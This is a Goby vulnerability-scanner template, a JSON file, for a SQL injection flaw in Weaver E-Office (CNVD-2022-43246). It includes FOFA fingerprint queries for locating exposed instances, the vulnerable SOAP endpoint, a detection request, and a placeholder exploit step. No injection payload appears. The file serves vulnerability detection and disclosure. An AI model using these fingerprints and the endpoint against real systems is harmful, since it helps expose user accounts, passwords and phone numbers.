qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Weaver-E-Office-SQL-Injecti...

145 lines
6.2 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Weaver E-Office SQL Injection Vulnerability (CNVD-2022-43246)",
"Description": "<p>Weaver E-office is a standard collaborative mobile office platform under Weaver.</p><p>There is a SQL injection vulnerability in Weaver E-office, and attackers can use this vulnerability to obtain any user account information, password, mobile phone number, etc. in the system.</p>",
"Product": "E-office",
"Homepage": "https://www.weaver.com.cn/",
"DisclosureDate": "2022-03-27",
"Author": "Lyaa0",
"FofaQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"",
"GobyQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"",
"Level": "2",
"Impact": "<p>Weaver E-office has SQL injection vulnerability, and attackers can obtain any user information in the system through this vulnerability, such as account numbers, encrypted passwords, mobile phone numbers, names, etc. After the password is decrypted, you can browse the oa internal system information file, etc.<br></p>",
"Recommendation": "<p>The manufacturer has released a patch to fix the vulnerability. Please update it in time:<a href=\"https://www.weaver.com.cn/\" target=\"_blank\">https://www.weaver.com.cn/</a><br></p>",
"References": [
"https://www.weaver.com.cn/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/webservice-json/login/login.wsdl.php",
"follow_redirect": true,
"header": {
"Content-Type": "text/xml;charset=UTF-8",
"Accept-Encoding": "gzip, deflate"
},
"data_type": "text",
"data": "<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:LoginServicewsdl\">\n <soapenv:Header/>\n <soapenv:Body>\n <urn:GetCurrentInformation soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <UserId xsi:type=\"xsd:string\"></UserId>\n </urn:GetCurrentInformation>\n </soapenv:Body>\n</soapenv:Envelope>"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "GetCurrentInformationResponse",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"SQL Injection"
],
"VulType": [
"SQL Injection"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
"CNVD-2022-43246"
],
"CVSSScore": "7.0",
"Translation": {
"CN": {
"Name": "泛微 E-Office SQL注入漏洞CNVD-2022-43246",
"Product": "E-office",
"Description": "<p>泛微E-office是泛微旗下的一款标准协同移动办公平台。</p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">泛微E-office</span>存在SQL注入漏洞攻击者可利用该漏洞获取系统内任意用户账号信息、密码、手机号等。<br></p>",
"Recommendation": "<p>厂商已发布补丁修复漏洞,请及时更新:<span style=\"color: var(--primaryFont-color);\"><a href=\"https://www.weaver.com.cn/\">https://www.weaver.com.cn/</a></span></p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">泛微E-office</span><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">存在SQL注入漏洞</span>攻击者可通过此漏洞获取系统内任意用户信息例如账号、加密密码、手机号、名字等。密码解密后可浏览oa内部系统信息文件等。<br></p>",
"VulType": [
"SQL 注⼊"
],
"Tags": [
"SQL 注⼊"
]
},
"EN": {
"Name": "Weaver E-Office SQL Injection Vulnerability (CNVD-2022-43246)",
"Product": "E-office",
"Description": "<p>Weaver E-office is a standard collaborative mobile office platform under Weaver.</p><p>There is a SQL injection vulnerability in Weaver E-office, and attackers can use this vulnerability to obtain any user account information, password, mobile phone number, etc. in the system.</p>",
"Recommendation": "<p>The manufacturer has released a patch to fix the vulnerability. Please update it in time:<a href=\"https://www.weaver.com.cn/\" target=\"_blank\">https://www.weaver.com.cn/</a><br></p>",
"Impact": "<p>Weaver E-office has SQL injection vulnerability, and attackers can obtain any user information in the system through this vulnerability, such as account numbers, encrypted passwords, mobile phone numbers, names, etc. After the password is decrypted, you can browse the oa internal system information file, etc.<br></p>",
"VulType": [
"SQL Injection"
],
"Tags": [
"SQL Injection"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink